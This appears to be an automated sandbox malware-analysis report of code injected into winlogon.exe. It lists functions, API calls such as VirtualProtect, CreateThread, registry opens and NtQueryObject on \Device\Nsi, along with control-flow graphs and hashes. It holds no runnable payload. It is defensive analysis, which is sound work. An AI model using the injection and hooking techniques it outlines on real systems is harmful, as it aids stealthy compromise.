                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1666949209-0
                                                                                                                                  • Opcode ID: f9c7edb839f8afab2ab00d4806129f23657d59249b786f986b6d92e07e061a8b
                                                                                                                                  • Instruction ID: a942265f263d1c6aa3c7b2db314f1e2570fec8393292db9b88e5502b485481de
                                                                                                                                  • Opcode Fuzzy Hash: f9c7edb839f8afab2ab00d4806129f23657d59249b786f986b6d92e07e061a8b
                                                                                                                                  • Instruction Fuzzy Hash: 04D18976248B8982DA709B16E49835AB7B0F3C8B88F51411BEACD477A6DF3CC591CF50
                                                                                                                                  Function 000002E9917555D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 166 2e9917555d0-2e9917555fc 167 2e9917555fe-2e991755606 166->167 168 2e99175560d-2e991755616 166->168 167->168 169 2e991755618-2e991755620 168->169 170 2e991755627-2e991755630 168->170 169->170 171 2e991755632-2e99175563a 170->171 172 2e991755641-2e99175564a 170->172 171->172 173 2e99175564c-2e991755651 172->173 174 2e991755656-2e991755661 GetCurrentThreadId 172->174 175 2e991755bd3-2e991755bda 173->175 176 2e99175566d-2e991755674 174->176 177 2e991755663-2e991755668 174->177 178 2e991755676-2e99175567c 176->178 179 2e991755681-2e99175568a 176->179 177->175 178->175 180 2e99175568c-2e991755691 179->180 181 2e991755696-2e9917556a2 179->181 180->175 182 2e9917556ce-2e991755725 call 2e991755be0 * 2 181->182 183 2e9917556a4-2e9917556c9 181->183 188 2e99175573a-2e991755743 182->188 189 2e991755727-2e99175572e 182->189 183->175 190 2e991755755-2e99175575e 188->190 191 2e991755745-2e991755752 188->191 192 2e991755730 189->192 193 2e991755736 189->193 195 2e991755760-2e991755770 190->195 196 2e991755773-2e991755798 call 2e991757d60 190->196 191->190 194 2e9917557b0-2e9917557b6 192->194 193->188 197 2e9917557a6-2e9917557aa 193->197 198 2e9917557e5-2e9917557eb 194->198 199 2e9917557b8-2e9917557d4 call 2e991754890 194->199 195->196 207 2e99175579e 196->207 208 2e99175582d-2e991755842 call 2e9917541c0 196->208 197->194 202 2e9917557ed-2e99175580c call 2e991757d9c 198->202 203 2e991755815-2e991755828 198->203 199->198 210 2e9917557d6-2e9917557de 199->210 202->203 203->175 207->197 213 2e991755851-2e99175585a 208->213 214 2e991755844-2e99175584c 208->214 210->198 215 2e99175586c-2e9917558ba call 2e991763ea0 213->215 216 2e99175585c-2e991755869 213->216 214->197 219 2e9917558c2-2e9917558ca 215->219 216->215 220 2e9917558d0-2e9917559bb call 2e991757940 219->220 221 2e9917559d7-2e9917559df 219->221 233 2e9917559bd 220->233 234 2e9917559bf-2e9917559ce call 2e991754560 220->234 222 2e9917559e1-2e9917559f4 call 2e991754a90 221->222 223 2e991755a23-2e991755a2b 221->223 237 2e9917559f6 222->237 238 2e9917559f8-2e991755a21 222->238 226 2e991755a2d-2e991755a35 223->226 227 2e991755a37-2e991755a46 223->227 226->227 230 2e991755a54-2e991755a61 226->230 231 2e991755a4f 227->231 232 2e991755a48 227->232 235 2e991755a64-2e991755ab9 call 2e991763800 230->235 236 2e991755a63 230->236 231->230 232->231 233->221 242 2e9917559d0 234->242 243 2e9917559d2 234->243 245 2e991755abb-2e991755ac3 235->245 246 2e991755ac8-2e991755b61 call 2e991754a10 call 2e991754970 VirtualProtect 235->246 236->235 237->223 238->221 242->221 243->219 251 2e991755b71-2e991755bd1 246->251 252 2e991755b63-2e991755b68 GetLastError 246->252 251->175 252->251
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 594dc9face250f325cdd0050e7745ffef46564ac88561e200211c92668648e15
                                                                                                                                  • Instruction ID: fd77efcf454a593052a900f5d24deb063e8333f21706fb0596c236d1f298a2bf
                                                                                                                                  • Opcode Fuzzy Hash: 594dc9face250f325cdd0050e7745ffef46564ac88561e200211c92668648e15
                                                                                                                                  • Instruction Fuzzy Hash: E002CC36259BC586DBA0CB56F49835AB7A0F3C5794F11011AEA8E87BA9DF7CC484CF10
                                                                                                                                  Function 000002E991722C8C Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3316853933-0
                                                                                                                                  • Opcode ID: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction ID: 86b18cc00f20ad3ba2a97ca244dab453444bddccd4bdbebc55ac331b23cb3e81
                                                                                                                                  • Opcode Fuzzy Hash: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction Fuzzy Hash: ED915B73B421D287DB64CF26D008B6DB391F744B94F56892ADF4917B89DA34D893CB20
                                                                                                                                  Function 000002E991753EE0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$AllocQuery
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 31662377-0
                                                                                                                                  • Opcode ID: 5ba12f6accd07a0eb55bf7dfd9b871ad288432e16da66455f45f403d1a1142ff
                                                                                                                                  • Instruction ID: 8ba598d568ffd65190b76ab362553a4096fa87b101414cdd4facefb4bec00a18
                                                                                                                                  • Opcode Fuzzy Hash: 5ba12f6accd07a0eb55bf7dfd9b871ad288432e16da66455f45f403d1a1142ff
                                                                                                                                  • Instruction Fuzzy Hash: D7313222359AC681EB719B16E05835A66B4F388784F51052AF5CE46BEADF3CC5C18F34
                                                                                                                                  Function 000002E9917537EC Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 000002E991753805
                                                                                                                                  • PathFindFileNameW.SHLWAPI ref: 000002E991753814
                                                                                                                                    • Part of subcall function 000002E991753D4C: StrCmpNIW.SHLWAPI(?,?,?,000002E991752722), ref: 000002E991753D64
                                                                                                                                    • Part of subcall function 000002E991753C98: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002E99175382B), ref: 000002E991753CA6
                                                                                                                                    • Part of subcall function 000002E991753C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E99175382B), ref: 000002E991753CD4
                                                                                                                                    • Part of subcall function 000002E991753C98: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E99175382B), ref: 000002E991753CF6
                                                                                                                                    • Part of subcall function 000002E991753C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E99175382B), ref: 000002E991753D11
                                                                                                                                    • Part of subcall function 000002E991753C98: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E99175382B), ref: 000002E991753D32
                                                                                                                                  • CreateThread.KERNELBASE ref: 000002E99175385B
                                                                                                                                    • Part of subcall function 000002E991751E38: GetCurrentThread.KERNEL32 ref: 000002E991751E43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1683269324-0
                                                                                                                                  • Opcode ID: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction ID: 74bbdc8d9ef711710cfb580921230ed5c503e86a188a60ebfc3e87c1c649e38b
                                                                                                                                  • Opcode Fuzzy Hash: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction Fuzzy Hash: 13115A30BD47C382FB68A767E40D36922A5BB547CAF82412F9446821E3EF79D0D48E31
                                                                                                                                  Function 000002E9917552F0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3733156554-0
                                                                                                                                  • Opcode ID: 138b8d06eba3c29c82db8ae31000ece8896a83a50fcfc52d630737eb27e5b0b5
                                                                                                                                  • Instruction ID: 59934aa14fbed775615614275cbadd493e30fbcbc3f9d3bb623e69e1c6b8d28f
                                                                                                                                  • Opcode Fuzzy Hash: 138b8d06eba3c29c82db8ae31000ece8896a83a50fcfc52d630737eb27e5b0b5
                                                                                                                                  • Instruction Fuzzy Hash: AAF03066268B8580D630DB02F45834AA7A0F3887D8F55011BFACD03B6BCB78C6C08F60
                                                                                                                                  Function 000002E991751BC0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 000002E991751724: GetProcessHeap.KERNEL32 ref: 000002E99175172F
                                                                                                                                    • Part of subcall function 000002E991751724: HeapAlloc.KERNEL32 ref: 000002E99175173E
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917517AE
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917517DB
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917517F5
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751815
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.KERNELBASE ref: 000002E991751830
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751850
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E99175186B
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E99175188B
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917518A6
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917518C6
                                                                                                                                  • SleepEx.KERNELBASE ref: 000002E991751BDB
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917518E1
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751901
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E99175191C
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E99175193C
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E991751957
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751977
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E991751992
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.KERNELBASE ref: 000002E99175199C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 948135145-0
                                                                                                                                  • Opcode ID: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction ID: e376f86ea4916966ac153127ec5cec751f2e67e269a9de7d95168439c608e474
                                                                                                                                  • Opcode Fuzzy Hash: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction Fuzzy Hash: 5331FC653806C342FB509B27D65936913A4FB44BC1F1A542B9E0B87697EF35D8D08B31
                                                                                                                                  Function 000002E99175F130 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 354 2e99175f130-2e99175f15f VirtualProtect
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: d03a29792b6748d9f8b50c36da3d412cbb8c174d26c0222ae433d454c6783b33
                                                                                                                                  • Instruction ID: 13e7b84320865d9b31e569f8acddc3596c4c77e6deba9caaafb55c679f67a583
                                                                                                                                  • Opcode Fuzzy Hash: d03a29792b6748d9f8b50c36da3d412cbb8c174d26c0222ae433d454c6783b33
                                                                                                                                  • Instruction Fuzzy Hash: BFD01225735581C3E300DB22D8497956368F398741FC1400AE949C2695CF7CC299CF61

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 000002E991752DD0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252stringlibraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 403 2e991752dd0-2e991752e49 405 2e991752e4f-2e991752e55 403->405 406 2e991753154-2e991753177 403->406 405->406 407 2e991752e5b-2e991752e5e 405->407 407->406 408 2e991752e64-2e991752e67 407->408 408->406 409 2e991752e6d-2e991752e7d GetModuleHandleA 408->409 410 2e991752e7f-2e991752e8f GetProcAddress 409->410 411 2e991752e91 409->411 412 2e991752e94-2e991752eb2 410->412 411->412 412->406 414 2e991752eb8-2e991752ed7 StrCmpNIW 412->414 414->406 415 2e991752edd-2e991752ee1 414->415 415->406 416 2e991752ee7-2e991752ef1 415->416 416->406 417 2e991752ef7-2e991752efe 416->417 417->406 418 2e991752f04-2e991752f17 417->418 419 2e991752f19-2e991752f25 418->419 420 2e991752f27 418->420 421 2e991752f2a-2e991752f2e 419->421 420->421 422 2e991752f3e 421->422 423 2e991752f30-2e991752f3c 421->423 424 2e991752f41-2e991752f4b 422->424 423->424 425 2e991753031-2e991753035 424->425 426 2e991752f51-2e991752f54 424->426 427 2e99175303b-2e99175303e 425->427 428 2e991753146-2e99175314e 425->428 429 2e991752f66-2e991752f70 426->429 430 2e991752f56-2e991752f63 call 2e991751a30 426->430 431 2e991753040-2e99175304c call 2e991751a30 427->431 432 2e99175304f-2e991753059 427->432 428->406 428->418 434 2e991752f72-2e991752f7f 429->434 435 2e991752fa4-2e991752fae 429->435 430->429 431->432 440 2e991753089-2e99175308c 432->440 441 2e99175305b-2e991753068 432->441 434->435 436 2e991752f81-2e991752f8e 434->436 437 2e991752fde-2e991752fe1 435->437 438 2e991752fb0-2e991752fbd 435->438 443 2e991752f91-2e991752f97 436->443 446 2e991752fef-2e991752ffc lstrlenW 437->446 447 2e991752fe3-2e991752fed call 2e991751cc0 437->447 438->437 444 2e991752fbf-2e991752fcc 438->444 449 2e99175308e-2e991753097 call 2e991751cc0 440->449 450 2e991753099-2e9917530a6 lstrlenW 440->450 441->440 448 2e99175306a-2e991753077 441->448 452 2e991752f9d-2e991752fa2 443->452 453 2e991753027-2e99175302c 443->453 456 2e991752fcf-2e991752fd5 444->456 459 2e991752ffe-2e99175300d call 2e991751cf8 446->459 460 2e99175300f-2e991753021 call 2e991753d4c 446->460 447->446 447->453 458 2e99175307a-2e991753080 448->458 449->450 468 2e9917530ca-2e9917530d5 449->468 454 2e9917530b9-2e9917530c3 call 2e991753d4c 450->454 455 2e9917530a8-2e9917530b7 call 2e991751cf8 450->455 452->435 452->443 463 2e9917530c6-2e9917530c8 453->463 454->463 455->454 455->468 456->453 466 2e991752fd7-2e991752fdc 456->466 458->468 469 2e991753082-2e991753087 458->469 459->453 459->460 460->453 460->463 463->428 463->468 466->437 466->456 474 2e991753140-2e991753144 468->474 475 2e9917530d7-2e9917530f7 call 2e991763800 468->475 469->440 469->458 474->428 479 2e99175311a-2e99175311d 475->479 480 2e9917530f9-2e991753117 call 2e991763800 475->480 479->474 481 2e99175311f-2e99175313d call 2e991763800 479->481 480->479 481->474
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$FileHandleNameProcess$AddressCloseFindImageModuleOpenPathProc
                                                                                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                  • API String ID: 3153948470-3850299575
                                                                                                                                  • Opcode ID: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction ID: aaed27ad3e305524e6bf0e175972d3d8431492384e3f66a1df6f92d166f47a2e
                                                                                                                                  • Opcode Fuzzy Hash: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction Fuzzy Hash: 07A19F62350AD682EB548F27D5487A9B3A5FB44B84F46501BEE09937A6EF35CCC0CB60
                                                                                                                                  Function 000002E991758270 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                  • Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction ID: 49dbb66c2b9d08f11e75c7ce488d5b0359c5f29976c97b303069a1c251fc4d82
                                                                                                                                  • Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
                                                                                                                                  • Instruction Fuzzy Hash: 24313072255BC18AEB608F62E8483DD7365F784784F45442ADA4D47B96DF38C588CB20
                                                                                                                                  Function 000002E99175CB40 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                  • Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction ID: 3903b66847189b81d25889496bb1b8e383e89abdb9bddb358c778eef8b30106a
                                                                                                                                  • Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
                                                                                                                                  • Instruction Fuzzy Hash: D5418132254FC186EB60CF26E84839E73A4F788798F55011AEA9D47B9ADF38C595CF10
                                                                                                                                  Function 000002E99175D7D8 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                  • Opcode ID: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction ID: 4b76ce216d5a720690b999f1a742873dfb43fe5f478b7fcddcaa06eaebb73a72
                                                                                                                                  • Opcode Fuzzy Hash: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
                                                                                                                                  • Instruction Fuzzy Hash: 25A108227A46C249FB20DB77D4483AE6BA1F341B94F15411FDE9927A97DB34C5C2CB20
                                                                                                                                  Function 000002E991751E38 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 000002E991751E43
